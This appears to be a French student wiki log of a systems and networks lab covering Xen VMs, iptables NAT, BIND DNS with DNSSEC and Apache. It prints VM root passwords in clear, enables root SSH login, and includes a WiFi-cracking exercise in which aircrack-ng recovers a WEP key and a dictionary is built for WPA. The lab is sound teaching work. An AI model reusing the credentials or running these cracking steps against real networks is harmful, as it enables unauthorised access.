xen-create-image --hostname=SE4.Manjaro --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.LinusTorvalds --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
</syntaxhighlight>On adapte les hostnames en fonction des nom de nos machines. <br />
<br />
'''''IMPORTANT :''''' Les résultats des commandes sont à noter car ellles contiennent les mots de passe et autres informations importantes.<br />
<br />
===== Nos résultats : =====<br />
CachyOS : <syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.CachyOS<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:8B:45:EC<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:p+nECGSXOPvFjDjk+/x8adAn8JxTTPjuknCTcFZxJNk (DSA)<br />
SSH Fingerprint : SHA256:YaNMhK5ZFF/TshemMHSmt08R9uBPAnhNK134XEZ0CuY (ECDSA)<br />
SSH Fingerprint : SHA256:qQNuBNfAoySUPOFPplDh8p0ZPtxRulz/vbOq+Pm4gwM (ED25519)<br />
SSH Fingerprint : SHA256:psWV2TNuHsZcRelqipM7TJ/mE4cvFI+oxndg6nvCpCk (RSA)<br />
Root Password : 6nyCiterydiMtnxsPDRsUys<br />
<br />
</syntaxhighlight>Manjaro : <syntaxhighlight lang="shell"><br />
<br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.Manjaro<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:36:79:D8<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:n+ojtWyKBODRtEppjCvAp6nd2cjL/Ily54j0cM03lMc (DSA)<br />
SSH Fingerprint : SHA256:K+Qa9NAU3JIGsMy3LEYCgFbfL3ozuiRKG+U3XsbV5ow (ECDSA)<br />
SSH Fingerprint : SHA256:AJLfxk4Zz8BZflWYOS8mifapH+uAFgGKA3WSj6rN0NA (ED25519)<br />
SSH Fingerprint : SHA256:/6iWOWoii0nJsbScwVYIGQAbuTI1/YIpaRyRdBl8mwE (RSA)<br />
Root Password : PgvMbhYvgtksg8tmiJnVZnQ<br />
</syntaxhighlight>LinusTorvalds :<syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.LinusTorvalds<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:AA:BF:EF<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:ouY/2dce0YI/mJD9Qw68oKU0xdw6Cs9ybgJxRm/FKiI (DSA)<br />
SSH Fingerprint : SHA256:p5lZznE0q8j6c68YTF5toYgBugOkc0IopTO+Ce9SiZ8 (ECDSA)<br />
SSH Fingerprint : SHA256:FbqBOG+0bBjuQBOlAytAlbMV/9VoJ8BAlFadG/VaGD4 (ED25519)<br />
SSH Fingerprint : SHA256:FCEtQGUhMhN9DDtTmt5zts/9PeC7ahnmJA7UOhMnGeg (RSA)<br />
Root Password : ekrmCSKb3ZAxXSYvNpjbiSK<br />
</syntaxhighlight><br />
<br />
==== Etape 4 : ====<br />
PHRASE MANQUANTE<syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.Manjaro.cfg<br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
xen create /etc/xen/SE4.LinusTorvalds.cfg<br />
</syntaxhighlight>On vérifie la liste des machines lancées via : <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
===== Nos résultats : =====<br />
<syntaxhighlight lang="shell"><br />
Name ID Mem VCPUs State Time(s)<br />
SE4.CachyOS 83 2048 1 -b---- 5.6<br />
SE4.Manjaro 85 2048 1 -b---- 5.8<br />
SE4.LinusTorvalds 87 2048 1 -b---- 5.3<br />
</syntaxhighlight><br />
<br />
==== Etape 5 : Partition ====<br />
<br />
===== Sur capbreton =====<br />
<br />
On partionne avec cette commande :<syntaxhighlight lang="shell"><br />
lvcreate -n SE4.CachyOS.var -L 10G virtual<br />
</syntaxhighlight><br />
On éteint notre machine : <syntaxhighlight lang="shell"><br />
xen shutdown SE4.CachyOS<br />
</syntaxhighlight><br />
Et on modifie :<syntaxhighlight lang="shell"><br />
vim /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
disk = [<br />
[...],<br />
'phy:/dev/virtual/SE4.CachyOS.home,xvda3,w',<br />
'phy:/dev/virtual/SE4.CachyOS.var,xvdb1,w'<br />
]<br />
</syntaxhighlight><br />
<br />
===== Sur la machine mandataire =====<br />
<br />
Nous ajoutons les partitions dans '''''/etc/fstab''''' : <syntaxhighlight lang="shell"><br />
/dev/xvda3 /var ext4 defaults 0 2<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
</syntaxhighlight><br />
<br />
Nous formatons les partitions avant de les utiliser : <syntaxhighlight lang="shell"><br />
mkfs -t ext4 /dev/xvda3<br />
mkfs -t ext4 /dev/xvdb1<br />
</syntaxhighlight><br />
<br />
Nous copions le contenu de '''/var''' : <syntaxhighlight lang="shell"><br />
mount /dev/xvda3 /mnt<br />
mv /var/* /mnt<br />
umount /mnt<br />
</syntaxhighlight><br />
<br />
Nous montons ensuite automatiquement les partitions définies dans '''/etc/fstab''' : <syntaxhighlight lang="shell"><br />
mount -a<br />
</syntaxhighlight><br />
<br />
===== De nouveaux sur capbreton =====<br />
On redémarre notre machine : <syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Ensuite on se connecte à notre VM via :<syntaxhighlight lang="shell"><br />
xen console SE4.CachyOS<br />
</syntaxhighlight><br />
<br />
===== Machines de Service - CachyOS & Manjaro =====<br />
Dans notre VM :<br />
<br />
On modifie :<syntaxhighlight lang="shell"><br />
vim /etc/network/interfaces<br />
</syntaxhighlight><br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
auto lo<br />
iface lo inet loopback<br />
<br />
auto eth0<br />
iface eth0 inet static<br />
address 192.168.10.3/24<br />
gateway 192.168.10.1<br />
<br />
# Pour l'ipv6<br />
auto eth1<br />
iface eth1 inet6 auto<br />
<br />
</syntaxhighlight><br />
<br />
* 172.60.0.3 est l'adresse IPV4 de la VM CachyOS<br />
<br />
===== Machine Mandataire - LinusTorvalds =====<br />
La machine mandataire agit comme passerelle IPv4 pour les machines de services. Voici sa configuration réseau :<br />
<br />
La machine mandataire va posséder trois adresses. Une adresse IPv6 routée, une adresse IPv4 routée et une adresse IPv4 pour le réseau privé avec ces deux machines de services. Pour ce faire, nous devons au préalable configurer une nouvelle interface eth1 pour y intégrer la seconde adresse IPv4.<br />
<br />
Sur capbreton, depuis <code>/etc/xen/SE4.CachyOS.cfg :</code><syntaxhighlight lang="shell"><br />
vif = [[...], 'mac=00:16:3E:8B:45:ED,bridge=SE4']<br />
</syntaxhighlight>Pour l'adresse mac on prend celui existant et on fait +1.<br />
<br />
Depuis <code>/etc/resolv.conf </code>:<syntaxhighlight lang="shell"><br />
nameserver 8.8.8.8<br />
<br />
</syntaxhighlight><br />
<br />
==== SSH 476 ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.3 ====<br />
<syntaxhighlight lang="shell"><br />
apt update<br />
apt upgrade<br />
<br />
apt install ssh<br />
apt install bind9<br />
apt install apache2<br />
</syntaxhighlight>(Dans TOUTES les VMs)<br />
<br />
On active le SSH en ajoutant dans <code>/etc/ssh/sshd_config</code> :<syntaxhighlight lang="shell"><br />
PermitRootLogin yes<br />
</syntaxhighlight>Pour redemarrer le service ssh :<syntaxhighlight lang="shell"><br />
/etc/init.d/ssh restart<br />
</syntaxhighlight>Pour la machine mandataire, ensuite après avoir reboot on peut faire dans nos machines de services :<syntaxhighlight lang="shell"><br />
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.10.0/24<br />
</syntaxhighlight> <br />
<br />
==== Mascarade ====<br />
Sur la mandataire : <syntaxhighlight lang="shell"><br />
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.10.3:22<br />
iptables-save<br />
<br />
</syntaxhighlight>Et on décommente cette ligne dans <code>/etc/sysctl.conf</code> : <syntaxhighlight lang="shell"><br />
net.ipv4.ip_forward=1<br />
</syntaxhighlight>Et maintenant nous pouvons nous connecter à notre machine de service en ssh : <syntaxhighlight lang="shell"><br />
#IPV4<br />
ssh root@193.48.57.166 -p 2202<br />
# IPV6<br />
ssh root@2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
</syntaxhighlight><br />
<br />
==== DNS ====<br />
Tout d'abord, il faut modifier <code>/etc/bind/named.conf.local</code> : <syntaxhighlight lang="shell"><br />
zone "archlinuxbtw.lol" {<br />
type master;<br />
file "/etc/bind/myZones/db.archlinuxbtw.lol";<br />
allow-transfer{secondaries;};<br />
notify yes;<br />
};<br />
<br />
acl "secondaries"{<br />
192.168.10.2;<br />
2001:660:4401:60a0:216:3eff:fe36:79d9;<br />
};<br />
<br />
zone "archlinux.lol" {<br />
type secondary;<br />
file "/etc/bind/backup/db.archlinux.lol";<br />
primaries{2001:660:4401:60a0:216:3eff:fe36:79d9;};<br />
};<br />
<br />
</syntaxhighlight>J'ai ensuite créée un dossier myZones puis j'ai créer db.archlinuxbtw.lol et j'y ai ajouter :<syntaxhighlight lang="shell"><br />
$TTL 400<br />
<br />
@ IN SOA ns.archlinuxbtw.lol admin.archlinuxbtw.lol (<br />
3609 ; Numero de version<br />
21600 ; Rafraichissement (6h)<br />
3600 ; Re-tentative (1h)<br />
2592000 ; Expiration (30j)<br />
86400 ; Cache negatif (24h)<br />
);<br />
<br />
IN NS ns.archlinuxbtw.lol.<br />
IN NS ns.archlinux.lol.<br />
@ IN A 193.48.57.166<br />
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
ns IN A 193.48.57.166<br />
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
<br />
www IN CNAME archlinuxbtw.lol<br />
<br />
</syntaxhighlight>Ensuite on restart le service via : <code>service named restart</code><br />
<br />
<br />
Création d'une clé<syntaxhighlight lang="shell"><br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout archlinuxbtw.lol.key -out archlinuxbtw.csr<br />
</syntaxhighlight><br />
[[Fichier:DNS Check.png|centré|vignette|452x452px|DNS Checker ]]<br />
Notre DNS est bien reconnu et la commande <code>dig @8.8.8.8 archlinuxbtw.lol</code> c'est grâce au Glue records.<br />
<br />
<br />
Génération des clés<br />
<br />
<br />
Changement nom machine <code>nano /etc/hostname : CachyOS</code><br />
<br />
Et dans /etc/hosts:<br />
<br />
127.0.1.1 archlinuxbtw.lol SE4.CachyOS<br />
<br />
==== DNSSEC ====<br />
Afin de protéger notre DNS contre des possibles attaques nous utiliserons DNSSEC. Ici nous utiliserons la politique DNSSEC : <code>"dnspol"</code><br />
Ensuite on crée le dossier keys et on donne les droits a bind d'écrire dedans avec :<syntaxhighlight lang="shell"><br />
mkdir /etc/bind/keys <br />
chown bind:bind /etc/bind/keys <br />
chmod 750 /etc/bind/keys<br />
</syntaxhighlight>Pour ce faire, dans <code>named.conf.local</code> il faut rajouter les 3 lignes à partir de "key-directory" :<syntaxhighlight lang="shell"><br />
key-directory "/etc/bind/keys";<br />
dnssec-policy "dnspol"; // DNSSEC automatique<br />
inline-signing yes;<br />
<br />
[...]<br />
<br />
dnssec-policy "dnspol" {<br />
keys {<br />
ksk key-directory lifetime unlimited algorithm 13;<br />
zsk key-directory lifetime unlimited algorithm 13;<br />
};<br />
nsec3param;<br />
};<br />
<br />
</syntaxhighlight>Pour l'activer, il faut restart bind9 avec <code>systemctl restart bind9</code><br />
<br />
Il ne reste qu'à ajouter la clé KSK sur Gandi et ensite on peut voir s'il fonctionne bien grace au site suivant : <nowiki>https://dnsviz.net</nowiki><br />
[[Fichier:DNSSec.png|centré|vignette|DNSSec]]<br />
<br />
<br />
Et on peut voir que nos clefs on bien été générer : <syntaxhighlight lang="shell"><br />
root@CachyOS:/etc/bind# ls keys/<br />
Karchlinuxbtw.lol.+013+24458.key Karchlinuxbtw.lol.+013+56682.key<br />
Karchlinuxbtw.lol.+013+24458.private Karchlinuxbtw.lol.+013+56682.private<br />
Karchlinuxbtw.lol.+013+24458.state Karchlinuxbtw.lol.+013+56682.state<br />
<br />
</syntaxhighlight><br />
<br />
==== Apache ====<br />
Dans ce repertoire <code>/etc/apache2/sites-availab</code>le : touch archlinuxbtw.lol.conf <br />
<br />
<br />
Je genere un crt via la commande : <br />
<br />
openssl x509 -req -days 365 -in archlinuxbtw.csr -signkey archlinuxb<br />
<br />
tw.lol.key -out archlinuxbtw.lol.crt<br />
<br />
<br />
Et je deplace mes fichiers dans : <br />
<br />
root@CachyOS:~# mv archlinuxbtw.lol.crt /etc/ssl/certs/ <br />
<br />
root@CachyOS:~# mv archlinuxbtw.lol.key /etc/ssl/private/ <br />
<br />
root@CachyOS:~# chmod 600 /etc/ssl/private/archlinuxbtw.lol.key<br />
<br />
Pour arreter le service par defaut : a2dissite 000-default.conf <br />
<br />
Et on verifie avec la commande : apache2ctl -S<br />
<br />
Iptable pour atteindres les ports https : <code># HTTP iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.10.3:80 # HTTPS iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination 192.168.10.3:443 iptables-save</code><br />
<br />
<br />
iptables -A FORWARD -p tcp -d 192.168.10.3 --dport 80 -j ACCEPT<br />
<br />
iptables -A FORWARD -p tcp -d 192.168.10.3 --dport 443 -j ACCEPT<br />
<br />
<br />
<br />
ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.3<br />
<br />
==== Effraction WiFi ====<br />
<br />
===== Cassage WEP =====<br />
Il faut tout faire sur la zabeth13 comme on avait tester sur 4 machines dans la semaine avec mon binome les cartes réseaux des autres machines ne marchent pas. <br />
<br />
Avec ip link je vois que l'interface wifi se nomme <code>wlx40a5ef0f679b</code>.<br />
<br />
On peut alors recuperer le bssid de notre réseau wifi a crack. Je suis le numéro 5 donc je dois crack la cracotte05 : <br />
<br />
<code>sudo airodump-ng wlx40a5ef0f679b</code><br />
<br />
<br />
Je recupere :<br />
<br />
<code>BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID</code><br />
<br />
<code>04:DA:D2:9C:50:54 -63 27 5 0 4 54e. WEP WEP cracotte05</code> <br />
<br />
Je peux alors dump correctement en filtrant seulement le bon bssid et le bon channel via cette commande : <br />
<br />
<code>sudo airodump-ng wlx40a5ef0f679b --write airodump --bssid 04:DA:D2:9C:50:54 -c4</code><br />
<br />
Et en parallele on lance ceci jusqu'a ce que la clef soit trouvé :<br />
<br />
<code>aircrack-ng airodump-01.cap</code><syntaxhighlight lang="shell"><br />
Aircrack-ng 1.7 <br />
<br />
<br />
[00:26:11] Tested 835 keys (got 68980 IVs)<br />
Got 70001 out of 70000 IVsStarting PTW attack with 70001 ivs.<br />
KB depth byte(vote)<br />
0 0/ 13 FF(97024) A3(79616) D9(79360) C5(78848) 3A(78592) E3(78592) 29(78336) D1(78336) E9(78080) 7C(77568) DF(77568) 34(76800) 85(76800) D8(76544) 24(76032) <br />
1 0/ 1 CA(108544) CB(80128) B5(79104) EB(78336) 10(77824) A8(77312) E5(76800) F8(76800) E7(76544) EE(76544) 27(76288) 4C(76288) 68(76288) CC(76288) E6(76288) <br />
2 2/ 2 A4(80128) 3A(78336) 14(76800) 5A(76544) D2(76544) 98(76032) 08(75776) 1D(75776) 40(75776) 99(75776) E4(75776) F2(75776) CD(75520) F7(75520) 56(75008) <br />
3 0/ 1 D1(100608) 89(79872) 22(77568) 11(77056) A0(77056) 9E(76800) B0(76800) 98(76544) A9(76544) 5A(76032) AB(76032) CD(76032) 9A(75776) 4D(75520) 51(75264) <br />
4 7/ 4 43(77312) 4E(76800) 0F(76544) 29(76544) BA(76544) 3E(76032) 61(75776) A6(75776) C6(75776) 89(75264) 21(75008) 5A(75008) 65(75008) C8(75008) DD(75008) <br />
<br />
KEY FOUND! [ FF:FF:FF:FF:FA:BC:06:CB:AE:EE:EE:EE:EE ] <br />
Decrypted correctly: 100%<br />
<br />
<br />
</syntaxhighlight><br />
<br />
===== Cassage WPA-PKS =====<br />
Ce script python permet de creer un dictionnaire :<syntaxhighlight lang="python"><br />
with open("dictionnaire_8_chiffres.txt", "w") as f:<br />
for i in range(100000000): # Pour générer des nombres de 00000000 à 99999999<br />
f.write(f"{i:08d}\n") # Écrit le nombre avec 8 chiffres<br />
<br />
</syntaxhighlight>ou alors avec crunch :<br />
<br />
<code>crunch 8 8 0123456789 -o dictionnaire_8_chiffres.txt</code><br />
<br />
<br />
<br />
Ensuite après execution nous pouvons recuperer le fichier .txt créer.<br />
<br />
<br />
<br />
On récuperer le dump comme precedemment pour cette borne pour mon cas :<br />
<br />
<code>BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID</code><br />
<br />
<code>44:AD:D9:5F:87:04 -43 3 5 2 13 54e. WPA2 CCMP PSK kracotte05</code> <br />
<br />
Je peux alors dump correctement en filtrant seulement le bon bssid et le bon channel via cette commande :<code>sudo airodump-ng wlx40a5ef0f679b --write airodumpWPA --bssid 44:AD:D9:5F:87:04 -c13</code><br />
<br />
Et ensuite après avoir récuperer 1 data minimum :<br />
<br />
<code>aircrack-ng airodump-01.cap</code><br />
=== Utiles ===<br />
<br />
=== XEN ===<br />
''<u>Liste des VMs allumées :</u>'' <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
''<u>Se connecter à la VM :</u>''<syntaxhighlight lang="shell"><br />
xen console <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
''<u>Sortir de la console xen :</u>''<syntaxhighlight lang="shell"><br />
Ctrl + Shift + 5<br />
</syntaxhighlight>''<u>Eteindre une VM :</u>'' <syntaxhighlight lang="shell"><br />
xen shutdown <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
<br />
''<u>Allumer une VM :</u>''<syntaxhighlight lang="shell"><br />
xen create /etc/xen/<nomMachine>.cfg<br />
</syntaxhighlight></div>
Cpayet
https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E5&diff=12153
Atelier SysRes SE4 2025/2026 E5
2026-02-10T14:59:15Z
<p>Cpayet : /* Cassage WEP */</p>
<hr />
<div>=== Compte rendu des commandes effectués ===<br />
<br />
==== Etape 1 : Connexion SSH ====<br />
ssh root@capbreton<br />
<br />
Mot de passe : <br />
<br />
==== Etape 2 : Créer un fichier dans le répertoire /etc/network/interfaces.d du Dom0 aux noms du binôme concerné ====<br />
On se déplace à ce répertoire :<syntaxhighlight lang="shell"><br />
cd /etc/network/interfaces.d/<br />
</syntaxhighlight>On créer ensuite ensuite un fichier aux noms de notre binôme et on l'édite :<syntaxhighlight lang="shell"><br />
touch SE42026_cpayet_tdelobel<br />
vim SE42026_cpayet_tdelobel<br />
<br />
</syntaxhighlight>Puis on donne un nom au bridge, ici c'est `pont_pacman`et on met dans le fichier ceci :<syntaxhighlight lang="shell"><br />
auto pont_pacman<br />
iface pont_pacman inet manual<br />
bridge_ports none<br />
up ip link set $IFACE up<br />
down ip link set $IFACE down<br />
</syntaxhighlight>Une fois le pont créer, il faut le démarrer :<syntaxhighlight lang="shell"><br />
ifup pont_pacman<br />
</syntaxhighlight><br />
<br />
==== Etape 3 : Création des VMs ====<br />
<syntaxhighlight lang="shell"><br />
xen-create-image --hostname=SE4.CachyOS --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.Manjaro --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.LinusTorvalds --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
</syntaxhighlight>On adapte les hostnames en fonction des nom de nos machines. <br />
<br />
'''''IMPORTANT :''''' Les résultats des commandes sont à noter car ellles contiennent les mots de passe et autres informations importantes.<br />
<br />
===== Nos résultats : =====<br />
CachyOS : <syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.CachyOS<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:8B:45:EC<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:p+nECGSXOPvFjDjk+/x8adAn8JxTTPjuknCTcFZxJNk (DSA)<br />
SSH Fingerprint : SHA256:YaNMhK5ZFF/TshemMHSmt08R9uBPAnhNK134XEZ0CuY (ECDSA)<br />
SSH Fingerprint : SHA256:qQNuBNfAoySUPOFPplDh8p0ZPtxRulz/vbOq+Pm4gwM (ED25519)<br />
SSH Fingerprint : SHA256:psWV2TNuHsZcRelqipM7TJ/mE4cvFI+oxndg6nvCpCk (RSA)<br />
Root Password : 6nyCiterydiMtnxsPDRsUys<br />
<br />
</syntaxhighlight>Manjaro : <syntaxhighlight lang="shell"><br />
<br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.Manjaro<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:36:79:D8<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:n+ojtWyKBODRtEppjCvAp6nd2cjL/Ily54j0cM03lMc (DSA)<br />
SSH Fingerprint : SHA256:K+Qa9NAU3JIGsMy3LEYCgFbfL3ozuiRKG+U3XsbV5ow (ECDSA)<br />
SSH Fingerprint : SHA256:AJLfxk4Zz8BZflWYOS8mifapH+uAFgGKA3WSj6rN0NA (ED25519)<br />
SSH Fingerprint : SHA256:/6iWOWoii0nJsbScwVYIGQAbuTI1/YIpaRyRdBl8mwE (RSA)<br />
Root Password : PgvMbhYvgtksg8tmiJnVZnQ<br />
</syntaxhighlight>LinusTorvalds :<syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.LinusTorvalds<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:AA:BF:EF<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:ouY/2dce0YI/mJD9Qw68oKU0xdw6Cs9ybgJxRm/FKiI (DSA)<br />
SSH Fingerprint : SHA256:p5lZznE0q8j6c68YTF5toYgBugOkc0IopTO+Ce9SiZ8 (ECDSA)<br />
SSH Fingerprint : SHA256:FbqBOG+0bBjuQBOlAytAlbMV/9VoJ8BAlFadG/VaGD4 (ED25519)<br />
SSH Fingerprint : SHA256:FCEtQGUhMhN9DDtTmt5zts/9PeC7ahnmJA7UOhMnGeg (RSA)<br />
Root Password : ekrmCSKb3ZAxXSYvNpjbiSK<br />
</syntaxhighlight><br />
<br />
==== Etape 4 : ====<br />
PHRASE MANQUANTE<syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.Manjaro.cfg<br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
xen create /etc/xen/SE4.LinusTorvalds.cfg<br />
</syntaxhighlight>On vérifie la liste des machines lancées via : <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
===== Nos résultats : =====<br />
<syntaxhighlight lang="shell"><br />
Name ID Mem VCPUs State Time(s)<br />
SE4.CachyOS 83 2048 1 -b---- 5.6<br />
SE4.Manjaro 85 2048 1 -b---- 5.8<br />
SE4.LinusTorvalds 87 2048 1 -b---- 5.3<br />
</syntaxhighlight><br />
<br />
==== Etape 5 : Partition ====<br />
<br />
===== Sur capbreton =====<br />
<br />
On partionne avec cette commande :<syntaxhighlight lang="shell"><br />
lvcreate -n SE4.CachyOS.var -L 10G virtual<br />
</syntaxhighlight><br />
On éteint notre machine : <syntaxhighlight lang="shell"><br />
xen shutdown SE4.CachyOS<br />
</syntaxhighlight><br />
Et on modifie :<syntaxhighlight lang="shell"><br />
vim /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
disk = [<br />
[...],<br />
'phy:/dev/virtual/SE4.CachyOS.home,xvda3,w',<br />
'phy:/dev/virtual/SE4.CachyOS.var,xvdb1,w'<br />
]<br />
</syntaxhighlight><br />
<br />
===== Sur la machine mandataire =====<br />
<br />
Nous ajoutons les partitions dans '''''/etc/fstab''''' : <syntaxhighlight lang="shell"><br />
/dev/xvda3 /var ext4 defaults 0 2<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
</syntaxhighlight><br />
<br />
Nous formatons les partitions avant de les utiliser : <syntaxhighlight lang="shell"><br />
mkfs -t ext4 /dev/xvda3<br />
mkfs -t ext4 /dev/xvdb1<br />
</syntaxhighlight><br />
<br />
Nous copions le contenu de '''/var''' : <syntaxhighlight lang="shell"><br />
mount /dev/xvda3 /mnt<br />
mv /var/* /mnt<br />
umount /mnt<br />
</syntaxhighlight><br />
<br />
Nous montons ensuite automatiquement les partitions définies dans '''/etc/fstab''' : <syntaxhighlight lang="shell"><br />
mount -a<br />
</syntaxhighlight><br />
<br />
===== De nouveaux sur capbreton =====<br />
On redémarre notre machine : <syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Ensuite on se connecte à notre VM via :<syntaxhighlight lang="shell"><br />
xen console SE4.CachyOS<br />
</syntaxhighlight><br />
<br />
===== Machines de Service - CachyOS & Manjaro =====<br />
Dans notre VM :<br />
<br />
On modifie :<syntaxhighlight lang="shell"><br />
vim /etc/network/interfaces<br />
</syntaxhighlight><br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
auto lo<br />
iface lo inet loopback<br />
<br />
auto eth0<br />
iface eth0 inet static<br />
address 192.168.10.3/24<br />
gateway 192.168.10.1<br />
<br />
# Pour l'ipv6<br />
auto eth1<br />
iface eth1 inet6 auto<br />
<br />
</syntaxhighlight><br />
<br />
* 172.60.0.3 est l'adresse IPV4 de la VM CachyOS<br />
<br />
===== Machine Mandataire - LinusTorvalds =====<br />
La machine mandataire agit comme passerelle IPv4 pour les machines de services. Voici sa configuration réseau :<br />
<br />
La machine mandataire va posséder trois adresses. Une adresse IPv6 routée, une adresse IPv4 routée et une adresse IPv4 pour le réseau privé avec ces deux machines de services. Pour ce faire, nous devons au préalable configurer une nouvelle interface eth1 pour y intégrer la seconde adresse IPv4.<br />
<br />
Sur capbreton, depuis <code>/etc/xen/SE4.CachyOS.cfg :</code><syntaxhighlight lang="shell"><br />
vif = [[...], 'mac=00:16:3E:8B:45:ED,bridge=SE4']<br />
</syntaxhighlight>Pour l'adresse mac on prend celui existant et on fait +1.<br />
<br />
Depuis <code>/etc/resolv.conf </code>:<syntaxhighlight lang="shell"><br />
nameserver 8.8.8.8<br />
<br />
</syntaxhighlight><br />
<br />
==== SSH 476 ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.3 ====<br />
<syntaxhighlight lang="shell"><br />
apt update<br />
apt upgrade<br />
<br />
apt install ssh<br />
apt install bind9<br />
apt install apache2<br />
</syntaxhighlight>(Dans TOUTES les VMs)<br />
<br />
On active le SSH en ajoutant dans <code>/etc/ssh/sshd_config</code> :<syntaxhighlight lang="shell"><br />
PermitRootLogin yes<br />
</syntaxhighlight>Pour redemarrer le service ssh :<syntaxhighlight lang="shell"><br />
/etc/init.d/ssh restart<br />
</syntaxhighlight>Pour la machine mandataire, ensuite après avoir reboot on peut faire dans nos machines de services :<syntaxhighlight lang="shell"><br />
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.10.0/24<br />
</syntaxhighlight> <br />
<br />
==== Mascarade ====<br />
Sur la mandataire : <syntaxhighlight lang="shell"><br />
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.10.3:22<br />
iptables-save<br />
<br />
</syntaxhighlight>Et on décommente cette ligne dans <code>/etc/sysctl.conf</code> : <syntaxhighlight lang="shell"><br />
net.ipv4.ip_forward=1<br />
</syntaxhighlight>Et maintenant nous pouvons nous connecter à notre machine de service en ssh : <syntaxhighlight lang="shell"><br />
#IPV4<br />
ssh root@193.48.57.166 -p 2202<br />
# IPV6<br />
ssh root@2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
</syntaxhighlight><br />
<br />
==== DNS ====<br />
Tout d'abord, il faut modifier <code>/etc/bind/named.conf.local</code> : <syntaxhighlight lang="shell"><br />
zone "archlinuxbtw.lol" {<br />
type master;<br />
file "/etc/bind/myZones/db.archlinuxbtw.lol";<br />
allow-transfer{secondaries;};<br />
notify yes;<br />
};<br />
<br />
acl "secondaries"{<br />
192.168.10.2;<br />
2001:660:4401:60a0:216:3eff:fe36:79d9;<br />
};<br />
<br />
zone "archlinux.lol" {<br />
type secondary;<br />
file "/etc/bind/backup/db.archlinux.lol";<br />
primaries{2001:660:4401:60a0:216:3eff:fe36:79d9;};<br />
};<br />
<br />
</syntaxhighlight>J'ai ensuite créée un dossier myZones puis j'ai créer db.archlinuxbtw.lol et j'y ai ajouter :<syntaxhighlight lang="shell"><br />
$TTL 400<br />
<br />
@ IN SOA ns.archlinuxbtw.lol admin.archlinuxbtw.lol (<br />
3609 ; Numero de version<br />
21600 ; Rafraichissement (6h)<br />
3600 ; Re-tentative (1h)<br />
2592000 ; Expiration (30j)<br />
86400 ; Cache negatif (24h)<br />
);<br />
<br />
